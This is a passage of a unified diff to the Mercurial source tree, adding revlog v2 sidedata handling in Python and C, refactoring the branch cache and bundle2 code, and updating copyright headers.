_rbcrecfmt = b'>4sI'
_rbcrecsize = calcsize(_rbcrecfmt)
+_rbcmininc = 64 * _rbcrecsize
_rbcnodelen = 4
_rbcbranchidxmask = 0x7FFFFFFF
_rbccloseflag = 0x80000000
@@ -703,8 +711,10 @@
self._setcachedata(rev, reponode, branchidx)
return b, close
- def setdata(self, branch, rev, node, close):
+ def setdata(self, rev, changelogrevision):
"""add new data information to the cache"""
+ branch, close = changelogrevision.branchinfo
+
if branch in self._namesreverse:
branchidx = self._namesreverse[branch]
else:
@@ -713,7 +723,7 @@
self._namesreverse[branch] = branchidx
if close:
branchidx |= _rbccloseflag
- self._setcachedata(rev, node, branchidx)
+ self._setcachedata(rev, self._repo.changelog.node(rev), branchidx)
# If no cache data were readable (non exists, bad permission, etc)
# the cache was bypassing itself by setting:
#
@@ -728,11 +738,15 @@
if rev == nullrev:
return
rbcrevidx = rev * _rbcrecsize
- if len(self._rbcrevs) < rbcrevidx + _rbcrecsize:
- self._rbcrevs.extend(
- b'\0'
- * (len(self._repo.changelog) * _rbcrecsize - len(self._rbcrevs))
- )
+ requiredsize = rbcrevidx + _rbcrecsize
+ rbccur = len(self._rbcrevs)
+ if rbccur < requiredsize:
+ # bytearray doesn't allocate extra space at least in Python 3.7.
+ # When multiple changesets are added in a row, precise resize would
+ # result in quadratic complexity. Overallocate to compensate by
+ # use the classic doubling technique for dynamic arrays instead.
+ # If there was a gap in the map before, less space will be reserved.
+ self._rbcrevs.extend(b'\0' * max(_rbcmininc, requiredsize))
pack_into(_rbcrecfmt, self._rbcrevs, rbcrevidx, node, branchidx)
self._rbcrevslen = min(self._rbcrevslen, rev)
--- a/mercurial/bundle2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundle2.py Tue Apr 20 11:01:06 2021 -0400
@@ -177,7 +177,10 @@
url,
util,
)
-from .utils import stringutil
+from .utils import (
+ stringutil,
+ urlutil,
+)
urlerr = util.urlerr
urlreq = util.urlreq
@@ -1598,7 +1601,6 @@
b'digests': tuple(sorted(util.DIGESTS.keys())),
b'remote-changegroup': (b'http', b'https'),
b'hgtagsfnodes': (),
- b'rev-branch-cache': (),
b'phases': (b'heads',),
b'stream': (b'v2',),
}
@@ -1643,6 +1645,9 @@
# Else always advertise support on client, because payload support
# should always be advertised.
+ # b'rev-branch-cache is no longer advertised, but still supported
+ # for legacy clients.
+
return caps
@@ -1769,7 +1774,7 @@
for node in outgoing.ancestorsof:
# Don't compute missing, as this may slow down serving.
fnode = cache.getfnode(node, computemissing=False)
- if fnode is not None:
+ if fnode:
chunks.extend([node, fnode])
if chunks:
@@ -1810,6 +1815,28 @@
return params
+def format_remote_wanted_sidedata(repo):
+ """Formats a repo's wanted sidedata categories into a bytestring for
+ capabilities exchange."""
+ wanted = b""
+ if repo._wanted_sidedata:
+ wanted = b','.join(
+ pycompat.bytestr(c) for c in sorted(repo._wanted_sidedata)
+ )
+ return wanted
+
+
+def read_remote_wanted_sidedata(remote):
+ sidedata_categories = remote.capable(b'exp-wanted-sidedata')
+ return read_wanted_sidedata(sidedata_categories)
+
+
+def read_wanted_sidedata(formatted):
+ if formatted:
+ return set(formatted.split(b','))
+ return set()
+
+
def addpartbundlestream2(bundler, repo, **kwargs):
if not kwargs.get('stream', False):
return
@@ -1955,6 +1982,7 @@
b'version',
b'nbchanges',
b'exp-sidedata',
+ b'exp-wanted-sidedata',
b'treemanifest',
b'targetphase',
),
@@ -1997,11 +2025,15 @@
targetphase = inpart.params.get(b'targetphase')
if targetphase is not None:
extrakwargs['targetphase'] = int(targetphase)
+
+ remote_sidedata = inpart.params.get(b'exp-wanted-sidedata')
+ extrakwargs['sidedata_categories'] = read_wanted_sidedata(remote_sidedata)
+
ret = _processchangegroup(
op,
cg,
tr,
- b'bundle2',
+ op.source,
b'bundle2',
expectedtotal=nbchangesets,
**extrakwargs
@@ -2044,7 +2076,7 @@
raw_url = inpart.params[b'url']
except KeyError:
raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url')
- parsed_url = util.url(raw_url)
+ parsed_url = urlutil.url(raw_url)
if parsed_url.scheme not in capabilities[b'remote-changegroup']:
raise error.Abort(
_(b'remote-changegroup does not support %s urls')
@@ -2081,9 +2113,9 @@
cg = exchange.readbundle(op.repo.ui, real_part, raw_url)
if not isinstance(cg, changegroup.cg1unpacker):
raise error.Abort(
- _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url)
+ _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url)
)
- ret = _processchangegroup(op, cg, tr, b'bundle2', b'bundle2')
+ ret = _processchangegroup(op, cg, tr, op.source, b'bundle2')
if op.reply is not None:
# This is definitely not the final form of this
# return. But one need to start somewhere.
@@ -2097,7 +2129,7 @@
except error.Abort as e:
raise error.Abort(
_(b'bundle at %s is corrupted:\n%s')
- % (util.hidepassword(raw_url), e.message)
+ % (urlutil.hidepassword(raw_url), e.message)
)
assert not inpart.read()
@@ -2117,7 +2149,7 @@
contains binary encoded (bookmark, node) tuple. If the local state does
not marks the one in the part, a PushRaced exception is raised
"""
- bookdata = bookmarks.binarydecode(inpart)
+ bookdata = bookmarks.binarydecode(op.repo, inpart)
msgstandard = (
b'remote repository changed while pushing - please try again '
@@ -2347,7 +2379,7 @@
When mode is 'records', the information is recorded into the 'bookmarks'
records of the bundle operation. This behavior is suitable for pulling.
"""
- changes = bookmarks.binarydecode(inpart)
+ changes = bookmarks.binarydecode(op.repo, inpart)
pushkeycompat = op.repo.ui.configbool(
b'server', b'bookmarks-pushkey-compat'
@@ -2478,35 +2510,10 @@
@parthandler(b'cache:rev-branch-cache')
def handlerbc(op, inpart):
- """receive a rev-branch-cache payload and update the local cache
-
- The payload is a series of data related to each branch
-
- 1) branch name length
- 2) number of open heads
- 3) number of closed heads
- 4) open heads nodes
- 5) closed heads nodes
- """
- total = 0
- rawheader = inpart.read(rbcstruct.size)
- cache = op.repo.revbranchcache()
- cl = op.repo.unfiltered().changelog
- while rawheader:
- header = rbcstruct.unpack(rawheader)
- total += header[1] + header[2]
- utf8branch = inpart.read(header[0])
- branch = encoding.tolocal(utf8branch)
- for x in pycompat.xrange(header[1]):
- node = inpart.read(20)
- rev = cl.rev(node)
- cache.setdata(branch, rev, node, False)
- for x in pycompat.xrange(header[2]):
- node = inpart.read(20)
- rev = cl.rev(node)
- cache.setdata(branch, rev, node, True)
- rawheader = inpart.read(rbcstruct.size)
- cache.write()
+ """Legacy part, ignored for compatibility with bundles from or
+ for Mercurial before 5.7. Newer Mercurial computes the cache
+ efficiently enough during unbundling that the additional transfer
+ is unnecessary."""
@parthandler(b'pushvars')
@@ -2561,8 +2568,6 @@
for r in repo.revs(b"::%ln", common):
commonnodes.add(cl.node(r))
if commonnodes:
- # XXX: we should only send the filelogs (and treemanifest). user
- # already has the changelog and manifest
packer = changegroup.getbundler(
cgversion,
repo,
@@ -2584,5 +2589,7 @@
part.addparam(b'treemanifest', b'1')
if b'exp-sidedata-flag' in repo.requirements:
part.addparam(b'exp-sidedata', b'1')
+ wanted = format_remote_wanted_sidedata(repo)
+ part.addparam(b'exp-wanted-sidedata', wanted)
return bundler
--- a/mercurial/bundlecaches.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundlecaches.py Tue Apr 20 11:01:06 2021 -0400
@@ -9,6 +9,7 @@
from . import (
error,
+ requirements as requirementsmod,
sslutil,
util,
)
@@ -164,7 +165,7 @@
compression = spec
version = b'v1'
# Generaldelta repos require v2.
- if b'generaldelta' in repo.requirements:
+ if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements:
version = b'v2'
# Modern compression engines require v2.
if compression not in _bundlespecv1compengines:
--- a/mercurial/bundlerepo.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/bundlerepo.py Tue Apr 20 11:01:06 2021 -0400
@@ -43,6 +43,9 @@
util,
vfs as vfsmod,
)
+from .utils import (
+ urlutil,
+)
class bundlerevlog(revlog.revlog):
@@ -61,7 +64,7 @@
self.repotiprev = n - 1
self.bundlerevs = set() # used by 'bundle()' revset expression
for deltadata in cgunpacker.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
size = len(delta)
start = cgunpacker.tell() - size
@@ -175,9 +178,15 @@
class bundlemanifest(bundlerevlog, manifest.manifestrevlog):
def __init__(
- self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b''
+ self,
+ nodeconstants,
+ opener,
+ cgunpacker,
+ linkmapper,
+ dirlogstarts=None,
+ dir=b'',
):
- manifest.manifestrevlog.__init__(self, opener, tree=dir)
+ manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir)
bundlerevlog.__init__(
self, opener, self.indexfile, cgunpacker, linkmapper
)
@@ -192,6 +201,7 @@
if d in self._dirlogstarts:
self.bundle.seek(self._dirlogstarts[d])
return bundlemanifest(
+ self.nodeconstants,
self.opener,
self.bundle,
self._linkmapper,
@@ -368,7 +378,9 @@
# consume the header if it exists
self._cgunpacker.manifestheader()
linkmapper = self.unfiltered().changelog.rev
- rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper)
+ rootstore = bundlemanifest(
+ self.nodeconstants, self.svfs, self._cgunpacker, linkmapper
+ )
self.filestart = self._cgunpacker.tell()
return manifest.manifestlog(
@@ -466,7 +478,7 @@
cwd = pathutil.normasprefix(cwd)
if parentpath.startswith(cwd):
parentpath = parentpath[len(cwd) :]
- u = util.url(path)
+ u = urlutil.url(path)
path = u.localpath()
if u.scheme == b'bundle':
s = path.split(b"+", 1)
--- a/mercurial/cacheutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cacheutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# scmutil.py - Mercurial core utility functions
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/cext/bdiff.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/bdiff.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
bdiff.c - efficient binary diff extension for Mercurial
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/charencode.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/charencode.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
charencode.c - miscellaneous character encoding
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/mpatch.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/mpatch.c Tue Apr 20 11:01:06 2021 -0400
@@ -14,7 +14,7 @@
allocation of intermediate Python objects. Working memory is about 2x
the total number of hunks.
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
--- a/mercurial/cext/osutil.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/osutil.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
osutil.c - native operating system services
- Copyright 2007 Matt Mackall and others
+ Copyright 2007 Olivia Mackall and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -119,7 +119,7 @@
static void listdir_stat_dealloc(PyObject *o)
{
- o->ob_type->tp_free(o);
+ Py_TYPE(o)->tp_free(o);
}
static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key)
--- a/mercurial/cext/parsers.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/parsers.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
parsers.c - efficient content parsing
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -638,7 +638,7 @@
PyObject *encodedir(PyObject *self, PyObject *args);
PyObject *pathencode(PyObject *self, PyObject *args);
PyObject *lowerencode(PyObject *self, PyObject *args);
-PyObject *parse_index2(PyObject *self, PyObject *args);
+PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs);
static PyMethodDef methods[] = {
{"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"},
@@ -646,7 +646,8 @@
"create a set containing non-normal and other parent entries of given "
"dirstate\n"},
{"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"},
- {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"},
+ {"parse_index2", (PyCFunction)parse_index2, METH_VARARGS | METH_KEYWORDS,
+ "parse a revlog index\n"},
{"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"},
{"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"},
{"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"},
--- a/mercurial/cext/pathencode.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/pathencode.c Tue Apr 20 11:01:06 2021 -0400
@@ -21,6 +21,7 @@
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
+#include "pythoncapi_compat.h"
#include "util.h"
@@ -678,7 +679,7 @@
}
assert(PyBytes_Check(ret));
- Py_SIZE(ret) = destlen;
+ Py_SET_SIZE(ret, destlen);
return ret;
}
--- a/mercurial/cext/revlog.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/cext/revlog.c Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
/*
parsers.c - efficient content parsing
- Copyright 2008 Matt Mackall <mpm@selenic.com> and others
+ Copyright 2008 Olivia Mackall <olivia@selenic.com> and others
This software may be used and distributed according to the terms of
the GNU General Public License, incorporated herein by reference.
@@ -15,6 +15,7 @@
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
+#include <structmember.h>
#include "bitmanipulation.h"
#include "charencode.h"
@@ -98,6 +99,7 @@
int ntlookups; /* # lookups */
int ntmisses; /* # lookups that miss the cache */
int inlined;
+ long hdrsize; /* size of index headers. Differs in v1 v.s. v2 format */
};
static Py_ssize_t index_length(const indexObject *self)
@@ -113,14 +115,19 @@
static int index_find_node(indexObject *self, const char *node);
#if LONG_MAX == 0x7fffffffL
-static const char *const tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#");
+static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#");
+static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki");
#else
-static const char *const tuple_format = PY23("kiiiiiis#", "kiiiiiiy#");
+static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#");
+static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki");
#endif
/* A RevlogNG v1 index entry is 64 bytes long. */
static const long v1_hdrsize = 64;
+/* A Revlogv2 index entry is 96 bytes long. */
+static const long v2_hdrsize = 96;
+
static void raise_revlog_error(void)
{
PyObject *mod = NULL, *dict = NULL, *errclass = NULL;
@@ -157,7 +164,7 @@
static const char *index_deref(indexObject *self, Py_ssize_t pos)
{
if (pos >= self->length)
- return self->added + (pos - self->length) * v1_hdrsize;
+ return self->added + (pos - self->length) * self->hdrsize;
if (self->inlined && pos > 0) {
if (self->offsets == NULL) {
@@ -174,7 +181,7 @@
return self->offsets[pos];
}
- return (const char *)(self->buf.buf) + pos * v1_hdrsize;
+ return (const char *)(self->buf.buf) + pos * self->hdrsize;
}
/*
@@ -280,8 +287,9 @@
*/
static PyObject *index_get(indexObject *self, Py_ssize_t pos)
{
- uint64_t offset_flags;
- int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2;
+ uint64_t offset_flags, sidedata_offset;
+ int comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2,
+ sidedata_comp_len;
const char *c_node_id;
const char *data;
Py_ssize_t length = index_length(self);
@@ -320,9 +328,19 @@
parent_2 = getbe32(data + 28);
c_node_id = data + 32;
- return Py_BuildValue(tuple_format, offset_flags, comp_len, uncomp_len,
- base_rev, link_rev, parent_1, parent_2, c_node_id,
- self->nodelen);
+ if (self->hdrsize == v1_hdrsize) {
+ return Py_BuildValue(v1_tuple_format, offset_flags, comp_len,
+ uncomp_len, base_rev, link_rev, parent_1,
+ parent_2, c_node_id, self->nodelen);
+ } else {
+ sidedata_offset = getbe64(data + 64);
+ sidedata_comp_len = getbe32(data + 72);
+
+ return Py_BuildValue(v2_tuple_format, offset_flags, comp_len,
+ uncomp_len, base_rev, link_rev, parent_1,
+ parent_2, c_node_id, self->nodelen,
+ sidedata_offset, sidedata_comp_len);
+ }
}
/*
@@ -373,18 +391,31 @@
static PyObject *index_append(indexObject *self, PyObject *obj)
{
- uint64_t offset_flags;
+ uint64_t offset_flags, sidedata_offset;
int rev, comp_len, uncomp_len, base_rev, link_rev, parent_1, parent_2;
- Py_ssize_t c_node_id_len;
+ Py_ssize_t c_node_id_len, sidedata_comp_len;
const char *c_node_id;
char *data;
- if (!PyArg_ParseTuple(obj, tuple_format, &offset_flags, &comp_len,
- &uncomp_len, &base_rev, &link_rev, &parent_1,
- &parent_2, &c_node_id, &c_node_id_len)) {
- PyErr_SetString(PyExc_TypeError, "8-tuple required");
- return NULL;
+ if (self->hdrsize == v1_hdrsize) {
+ if (!PyArg_ParseTuple(obj, v1_tuple_format, &offset_flags,
+ &comp_len, &uncomp_len, &base_rev,
+ &link_rev, &parent_1, &parent_2,
+ &c_node_id, &c_node_id_len)) {
+ PyErr_SetString(PyExc_TypeError, "8-tuple required");
+ return NULL;
+ }
+ } else {
+ if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags,
+ &comp_len, &uncomp_len, &base_rev,
+ &link_rev, &parent_1, &parent_2,
+ &c_node_id, &c_node_id_len,
+ &sidedata_offset, &sidedata_comp_len)) {
+ PyErr_SetString(PyExc_TypeError, "10-tuple required");
+ return NULL;
+ }
}
+
if (c_node_id_len != self->nodelen) {
PyErr_SetString(PyExc_TypeError, "invalid node");
return NULL;
@@ -393,15 +424,15 @@
if (self->new_length == self->added_length) {
size_t new_added_length =
self->added_length ? self->added_length * 2 : 4096;
- void *new_added =
- PyMem_Realloc(self->added, new_added_length * v1_hdrsize);
+ void *new_added = PyMem_Realloc(self->added, new_added_length *
+ self->hdrsize);
if (!new_added)
return PyErr_NoMemory();
self->added = new_added;
self->added_length = new_added_length;
}
rev = self->length + self->new_length;
- data = self->added + v1_hdrsize * self->new_length++;
+ data = self->added + self->hdrsize * self->new_length++;
putbe32(offset_flags >> 32, data);
putbe32(offset_flags & 0xffffffffU, data + 4);
putbe32(comp_len, data + 8);
@@ -411,7 +442,14 @@
putbe32(parent_1, data + 24);
putbe32(parent_2, data + 28);
memcpy(data + 32, c_node_id, c_node_id_len);
+ /* Padding since SHA-1 is only 20 bytes for now */
memset(data + 32 + c_node_id_len, 0, 32 - c_node_id_len);
+ if (self->hdrsize != v1_hdrsize) {
+ putbe64(sidedata_offset, data + 64);
+ putbe32(sidedata_comp_len, data + 72);
+ /* Padding for 96 bytes alignment */
+ memset(data + 76, 0, self->hdrsize - 76);
+ }
if (self->ntinitialized)
nt_insert(&self->nt, c_node_id, rev);
@@ -420,6 +458,56 @@
Py_RETURN_NONE;
}
+/* Replace an existing index entry's sidedata offset and length with new ones.
+ This cannot be used outside of the context of sidedata rewriting,
+ inside the transaction that creates the given revision. */
+static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args)
+{
+ uint64_t sidedata_offset;
+ int rev;
+ Py_ssize_t sidedata_comp_len;
+ char *data;
+#if LONG_MAX == 0x7fffffffL
+ const char *const sidedata_format = PY23("nKi", "nKi");
+#else
+ const char *const sidedata_format = PY23("nki", "nki");
+#endif
+
+ if (self->hdrsize == v1_hdrsize || self->inlined) {
+ /*
+ There is a bug in the transaction handling when going from an
+ inline revlog to a separate index and data file. Turn it off until
+ it's fixed, since v2 revlogs sometimes get rewritten on exchange.
+ See issue6485.
+ */
+ raise_revlog_error();
+ return NULL;
+ }
+
+ if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset,
+ &sidedata_comp_len))
+ return NULL;
+
+ if (rev < 0 || rev >= index_length(self)) {
+ PyErr_SetString(PyExc_IndexError, "revision outside index");
+ return NULL;
+ }
+ if (rev < self->length) {
+ PyErr_SetString(
+ PyExc_IndexError,
+ "cannot rewrite entries outside of this transaction");
+ return NULL;
+ }
+
+ /* Find the newly added node, offset from the "already on-disk" length
+ */
+ data = self->added + self->hdrsize * (rev - self->length);
+ putbe64(sidedata_offset, data + 64);
+ putbe32(sidedata_comp_len, data + 72);
+
+ Py_RETURN_NONE;
+}
+
static PyObject *index_stats(indexObject *self)
{
PyObject *obj = PyDict_New();
@@ -2563,14 +2651,17 @@
const char *data = (const char *)self->buf.buf;
Py_ssize_t pos = 0;
Py_ssize_t end = self->buf.len;
- long incr = v1_hdrsize;
+ long incr = self->hdrsize;
Py_ssize_t len = 0;
- while (pos + v1_hdrsize <= end && pos >= 0) {
- uint32_t comp_len;
+ while (pos + self->hdrsize <= end && pos >= 0) {
+ uint32_t comp_len, sidedata_comp_len = 0;
/* 3rd element of header is length of compressed inline data */
comp_len = getbe32(data + pos + 8);
- incr = v1_hdrsize + comp_len;
+ if (self->hdrsize == v2_hdrsize) {
+ sidedata_comp_len = getbe32(data + pos + 72);
+ }
+ incr = self->hdrsize + comp_len + sidedata_comp_len;
if (offsets)
offsets[len] = data + pos;
len++;
@@ -2586,11 +2677,13 @@
return len;
}
-static int index_init(indexObject *self, PyObject *args)
+static int index_init(indexObject *self, PyObject *args, PyObject *kwargs)
{
- PyObject *data_obj, *inlined_obj;
+ PyObject *data_obj, *inlined_obj, *revlogv2;
Py_ssize_t size;
+ static char *kwlist[] = {"data", "inlined", "revlogv2", NULL};
+
/* Initialize before argument-checking to avoid index_dealloc() crash.
*/
self->added = NULL;
@@ -2606,7 +2699,9 @@
self->nodelen = 20;
self->nullentry = NULL;
- if (!PyArg_ParseTuple(args, "OO", &data_obj, &inlined_obj))
+ revlogv2 = NULL;
+ if (!PyArg_ParseTupleAndKeywords(args, kwargs, "OO|O", kwlist,
+ &data_obj, &inlined_obj, &revlogv2))
return -1;
if (!PyObject_CheckBuffer(data_obj)) {
PyErr_SetString(PyExc_TypeError,
@@ -2618,8 +2713,22 @@
return -1;
}
- self->nullentry = Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0,
- -1, -1, -1, -1, nullid, self->nodelen);
+ if (revlogv2 && PyObject_IsTrue(revlogv2)) {
+ self->hdrsize = v2_hdrsize;
+ } else {
+ self->hdrsize = v1_hdrsize;
+ }
+
+ if (self->hdrsize == v1_hdrsize) {
+ self->nullentry =
+ Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1,
+ -1, -1, -1, nullid, self->nodelen);
+ } else {
+ self->nullentry =
+ Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0,
+ -1, -1, -1, -1, nullid, self->nodelen, 0, 0);
+ }
+
if (!self->nullentry)
return -1;
PyObject_GC_UnTrack(self->nullentry);
@@ -2641,11 +2750,11 @@
goto bail;
self->length = len;
} else {
- if (size % v1_hdrsize) {
+ if (size % self->hdrsize) {
PyErr_SetString(PyExc_ValueError, "corrupt index file");
goto bail;
}
- self->length = size / v1_hdrsize;
+ self->length = size / self->hdrsize;
}
return 0;
@@ -2730,6 +2839,8 @@
"compute phases"},
{"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS,
"reachableroots"},
+ {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info,
+ METH_VARARGS, "replace an existing index entry with a new value"},
{"headrevs", (PyCFunction)index_headrevs, METH_VARARGS,
"get head revisions"}, /* Can do filtering since 3.2 */
{"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS,
@@ -2756,6 +2867,12 @@
{NULL} /* Sentinel */
};
+static PyMemberDef index_members[] = {
+ {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0,
+ "size of an index entry"},
+ {NULL} /* Sentinel */
+};
+
PyTypeObject HgRevlogIndex_Type = {
PyVarObject_HEAD_INIT(NULL, 0) /* header */
"parsers.index", /* tp_name */
@@ -2785,7 +2902,7 @@
0, /* tp_iter */
0, /* tp_iternext */
index_methods, /* tp_methods */
- 0, /* tp_members */
+ index_members, /* tp_members */
index_getset, /* tp_getset */
0, /* tp_base */
0, /* tp_dict */
@@ -2797,16 +2914,16 @@
};
/*
- * returns a tuple of the form (index, index, cache) with elements as
+ * returns a tuple of the form (index, cache) with elements as
* follows:
*
- * index: an index object that lazily parses RevlogNG records
+ * index: an index object that lazily parses Revlog (v1 or v2) records
* cache: if data is inlined, a tuple (0, index_file_content), else None
* index_file_content could be a string, or a buffer
*
* added complications are for backwards compatibility
*/
-PyObject *parse_index2(PyObject *self, PyObject *args)
+PyObject *parse_index2(PyObject *self, PyObject *args, PyObject *kwargs)
{
PyObject *cache = NULL;
indexObject *idx;
@@ -2816,7 +2933,7 @@
if (idx == NULL)
goto bail;
- ret = index_init(idx, args);
+ ret = index_init(idx, args, kwargs);
if (ret == -1)
goto bail;
--- a/mercurial/changegroup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/changegroup.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
# changegroup.py - Mercurial changegroup manipulation functions
#
-# Copyright 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
+import collections
import os
import struct
import weakref
@@ -32,6 +33,7 @@
)
from .interfaces import repository
+from .revlogutils import sidedata as sidedatamod
_CHANGEGROUPV1_DELTA_HEADER = struct.Struct(b"20s20s20s20s")
_CHANGEGROUPV2_DELTA_HEADER = struct.Struct(b"20s20s20s20s20s")
@@ -202,7 +204,9 @@
header = self.deltaheader.unpack(headerdata)
delta = readexactly(self._stream, l - self.deltaheadersize)
node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
- return (node, p1, p2, cs, deltabase, delta, flags)
+ # cg4 forward-compat
+ sidedata = {}
+ return (node, p1, p2, cs, deltabase, delta, flags, sidedata)
def getchunks(self):
"""returns all the chunks contains in the bundle
@@ -249,7 +253,7 @@
pos = next
yield closechunk()
- def _unpackmanifests(self, repo, revmap, trp, prog):
+ def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None):
self.callback = prog.increment
# no need to check for empty manifest group here:
# if the result of the merge of 1 and 2 is the same in 3 and 4,
@@ -257,7 +261,8 @@
# be empty during the pull
self.manifestheader()
deltas = self.deltaiter()
- repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp)
+ storage = repo.manifestlog.getstorage(b'')
+ storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb)
prog.complete()
self.callback = None
@@ -269,6 +274,7 @@
url,
targetphase=phases.draft,
expectedtotal=None,
+ sidedata_categories=None,
):
"""Add the changegroup returned by source.read() to this repo.
srctype is a string like 'push', 'pull', or 'unbundle'. url is
@@ -279,9 +285,23 @@
- more heads than before: 1+added heads (2..n)
- fewer heads than before: -1-removed heads (-2..-n)
- number of heads stays the same: 1
+
+ `sidedata_categories` is an optional set of the remote's sidedata wanted
+ categories.
"""
repo = repo.unfiltered()
+ # Only useful if we're adding sidedata categories. If both peers have
+ # the same categories, then we simply don't do anything.
+ if self.version == b'04' and srctype == b'pull':
+ sidedata_helpers = get_sidedata_helpers(
+ repo,
+ sidedata_categories or set(),
+ pull=True,
+ )
+ else:
+ sidedata_helpers = None
+
def csmap(x):
repo.ui.debug(b"add changeset %s\n" % short(x))
return len(cl)
@@ -316,14 +336,16 @@
self.callback = progress.increment
efilesset = set()
- cgnodes = []
+ duprevs = []
- def ondupchangelog(cl, node):
- if cl.rev(node) < clstart:
- cgnodes.append(node)
+ def ondupchangelog(cl, rev):
+ if rev < clstart:
+ duprevs.append(rev)
- def onchangelog(cl, node):
- efilesset.update(cl.readfiles(node))
+ def onchangelog(cl, rev):
+ ctx = cl.changelogrevision(rev)
+ efilesset.update(ctx.files)
+ repo.register_changeset(rev, ctx)
self.changelogheader()
deltas = self.deltaiter()
@@ -331,6 +353,7 @@
deltas,
csmap,
trp,
+ alwayscache=True,
addrevisioncb=onchangelog,
duplicaterevisioncb=ondupchangelog,
):
@@ -348,6 +371,13 @@
efilesset = None
self.callback = None
+ # Keep track of the (non-changelog) revlogs we've updated and their
+ # range of new revisions for sidedata rewrite.
+ # TODO do something more efficient than keeping the reference to
+ # the revlogs, especially memory-wise.
+ touched_manifests = {}
+ touched_filelogs = {}
+
# pull off the manifest group
repo.ui.status(_(b"adding manifests\n"))
# We know that we'll never have more manifests than we had
@@ -355,7 +385,24 @@
progress = repo.ui.makeprogress(
_(b'manifests'), unit=_(b'chunks'), total=changesets
)
- self._unpackmanifests(repo, revmap, trp, progress)
+ on_manifest_rev = None
+ if sidedata_helpers and b'manifest' in sidedata_helpers[1]:
+
+ def on_manifest_rev(manifest, rev):
+ range = touched_manifests.get(manifest)
+ if not range:
+ touched_manifests[manifest] = (rev, rev)
+ else:
